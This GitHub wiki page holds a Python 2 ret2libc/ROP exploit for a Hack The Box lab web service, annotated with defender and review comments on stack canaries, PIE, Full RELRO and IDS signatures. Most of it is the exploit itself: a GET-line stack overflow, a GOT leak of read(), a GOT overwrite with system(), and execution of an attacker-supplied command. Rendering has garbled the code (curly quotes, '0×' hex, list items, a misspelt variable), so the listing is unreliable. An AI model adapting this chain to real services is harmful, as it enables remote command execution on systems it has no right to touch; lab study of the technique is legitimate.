smash v3 - adydawkins/htb-rabbit GitHub Wiki

#!/usr/bin/python
# Proof-of-concept ROP / ret2libc client for an HTB lab service listening on
# 127.0.0.1:9999 (Python 2: print statements, str payloads). Kept as an
# educational record of the technique. NOTE(review): the listing is mangled by
# wiki rendering (typographic quotes, "0×" in hex literals, numbered-list lines
# that were once "#" comments) and does not parse as shown.
#
# Defender's reading of the chain below:
#   - an oversized GET request line overruns a fixed-size stack buffer and
#     reaches saved RBX/RBP and the return address; a stack canary would abort
#     the process before any gadget runs.
#   - every gadget, PLT stub, GOT slot and .dynamic address is an absolute
#     constant (0x40xxxx / 0x60xxxx), as is typical of a non-PIE binary, so only
#     libc has to be leaked at runtime to beat ASLR.
#   - the read@plt -> GOT write relies on a writable GOT; Full RELRO
#     (-Wl,-z,relro,-z,now) makes it read-only after relocation and breaks
#     this stage.
#   - on the wire this looks like a GET line padded with hundreds of "A"s and
#     followed by raw binary, after which the client keeps sending data on the
#     same connection; that is a cheap signature for an IDS/WAF.
import os, sys, socket
import struct
import requests  # unused here (os is unused too); the script only uses raw sockets

# Target service: the lab box, reached over a local tunnel/loopback.
addr = (‘127.0.0.1’, 9999)

# Command string taken from the command line, NUL-terminated so the C side
# sees a proper string; it is later staged into .dynamic (see the first and
# last read@plt stages) and, per the author's comment there, handed to system().
cmd = sys.argv1+"\0"
#cmd = ‘ls’

# Offsets of read() and system() inside the target's libc build. They are
# build-specific; with ASLR only the distance between them matters, and the
# leaked GOT entry for read() is what rebases them at runtime.
libcread_offset = 0×0e8050
libcsystem_offset = 0×042510

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Start of the HTTP request line; everything after "GET /" is the overflow.
payload = r’GET /\AAAA’

#filler – fill buffer with A’s , thought this would be 536 – 4, but turns out to be 535
payload += ‘A’ * (535 – 4)

#overwrite RBX – offset 536
payload += ‘B’ * 8

#overwrite RBP – offset 544
payload += ‘C’ * 8

#fill before start of RSP – offset 568
payload += ‘D’ * 16

# From here on the payload is the ROP chain that replaces the return address
# and the stack above it. "PPPR" is the author's name for a pop/pop/pop/ret
# gadget used to load the three argument registers; the exact register order
# is not shown on this page.
#
# Stage 1: read(fd, .dynamic, len(cmd)) – stage the command string at a fixed,
# writable address. The fd value 4 is labelled "stdin"/"stdout" by the author;
# presumably it is the accepted client socket on the server side – confirm.
#write stdin to .dynamic using read@plt (0000000000400cf0 <read@plt>:)
someother = struct.pack(“<Q”, 0×000400cf0) #read() call loc
someother += struct.pack(“<Q”, 0×000401787) #PPPR
someother += struct.pack(“<Q”, 4) #stdin
someother += struct.pack(“<Q”, 0×000602e28) #.dynamic addr
someother += struct.pack(“<Q”, len(cmd)) #len of cmd

# Stage 2: write(fd, &GOT[read], 8) – send the resolved libc address of read()
# back to the client (the ASLR defeat). Lazy binding means this slot is only
# populated if read() has already been called by the server, which the author
# evidently relies on.
#leak address of read() in randomised libc
someother += struct.pack(“<Q”, 0×400c50) #write() call loc
someother += struct.pack(“<Q”, 0×000401787) #PPPR
someother += struct.pack(“<Q”, 4) #stdout
someother += struct.pack(“<Q”, 0×000603088) #read() in GOT
someother += struct.pack(“<Q”, 8) #len

# Stage 3: read(fd, &GOT[read], 8) – overwrite the GOT entry for read() with
# 8 bytes supplied by the client (the computed system() address, sent later).
# This is the step Full RELRO prevents.
#call read@plt to overwrite the ptr stored in GOT
someother += struct.pack(“<Q”, 0×000400cf0) #read() call loc
someother += struct.pack(“<Q”, 0×000401787) #PPPR
someother += struct.pack(“<Q”, 4) #stdin
someother += struct.pack(“<Q”, 0×000603088) #read() in GOT
someother += struct.pack(“<Q”, 8) #len

# Stage 4: call read@plt again – its GOT slot now points at system() – with the
# staged command string as the argument. ‘FFFFFFFF’ is eight ASCII bytes
# standing in for the return slot that follows the call (never meant to be
# reached).
#call read@plt with address of system() in libc
someother += struct.pack(“<Q”, 0×000400cf0) #read() call loc
someother += ‘FFFFFFFF’ # bogus
someother += struct.pack(“<Q”, 0×000602e28) #.dynamic addr system()

# NOTE(review): the two list items below were "#" comments in the original
# script (they repeat the libc offsets defined above); the wiki renderer turned
# them into a numbered list.
  1. libc read offset = 0×0e8050
  2. libc system offset = 0×042510

#padding – continue filler, writing into RSP
#payload += ‘E’ * 150
payload = payload + someother

s.connect(addr)

#print(payload+’ ’+r’HTTP/1.1’+’\n’+’Host: localhost:9999’+’\n’+’User-Agent: curl/7.60.0’+’\n’+’Accept: /‘+’\n’)

# The chain is delivered as the request line of an otherwise ordinary-looking
# HTTP/1.1 request (curl-like headers). Note the bare "\n" line endings and the
# extra blank lines used to terminate the header block.
s.send(payload+’ ’+r’HTTP/1.1’+’\n’+’Host: localhost:9999’+’\n’+’User-Agent: curl/7.60.0’+’\n’+’Accept: /‘+’\n’+’\n’+’\n’)

# Feeds stage 1 (read into .dynamic) with the command string.
s.send(cmd)

# NOTE(review): this list item and the indented lines under it were a "#"
# comment plus top-level statements in the original; the indentation is a
# rendering artefact. Stage 2's 8-byte leak is unpacked, read()'s libc base is
# turned into system()'s address via the two offsets, and the result is sent
# back to satisfy stage 3's GOT overwrite. `libcsytem_offset` is misspelt
# relative to the variable defined above (that name is never bound).
  1. calculate system() addr and send back
    readaddr = struct.unpack(“<Q”, s.recv(1024))0
    print “libc read() found at 0x%.8x” % readaddr
    systemaddr = readaddr – libcread_offset + libcsytem_offset
    print “libc system() found at 0x%.8x” % systemaddr
    s.send(struct.pack(“<Q”, systemaddr))

# Whatever the server writes back on the socket after stage 4.
print s.recv(1024)

# NOTE(review): `s.close` without parentheses only references the bound method;
# the socket is never actually closed (a `with`/`closing()` wrapper would do).
s.close
